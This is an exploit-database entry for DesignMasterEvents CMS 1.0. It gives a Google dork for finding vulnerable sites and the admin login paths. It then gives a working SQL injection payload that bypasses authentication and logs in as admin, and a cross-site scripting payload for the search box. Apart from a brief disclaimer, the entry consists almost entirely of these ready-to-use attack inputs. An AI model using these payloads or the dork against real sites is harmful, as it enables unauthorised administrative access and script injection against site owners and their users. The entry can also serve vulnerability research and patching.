DesignMasterEvents CMS 1.0 SQL Injection / Cross Site Scripting
CVE
Category
Price
Severity
CWE-89
N/A
High
Author
Risk
Exploitation Type
Date
N/A
High
Remote
2020-03-30
CPE
cpe:cpe:/a:designmasterevents:cms:1.0
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020030177 DesignMasterEvents CMS 1.0 SQL Injection / Cross Site Scripting # Exploit Title: DesignMasterEvents Conference management CMS SQL Injection Auth Bypass & XSS Vulnerability
# Google Dork: intext:"by :Design Master Events"
# Date: 2020-03-28
# Exploit Author: @ThelastVvV
# Vendor Homepage: http://www.designmasterevents.com
# Version: 1.0
# Tested on: Ubuntu
---------------------------------------------------------
PoC 1:
Authentication Bypass / SQL Injection
# Admin Control Panel Paths :
www.anysite.com/admin/
www.anysite.com/admin/login.php
Payload(s)
USERNAME: admin' or '1' = '1'; -- -
PASSWORD: vvv
the SQL injection attack has resulted in a bypass of the login, and we are now authenticated as "admin".
PoC 2 :
XSS Vulnerability
Payload(s) :
In Search box use payload:
"><img src=x onerror=prompt(document.domain);>
www.anysite.com/certificate.php
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum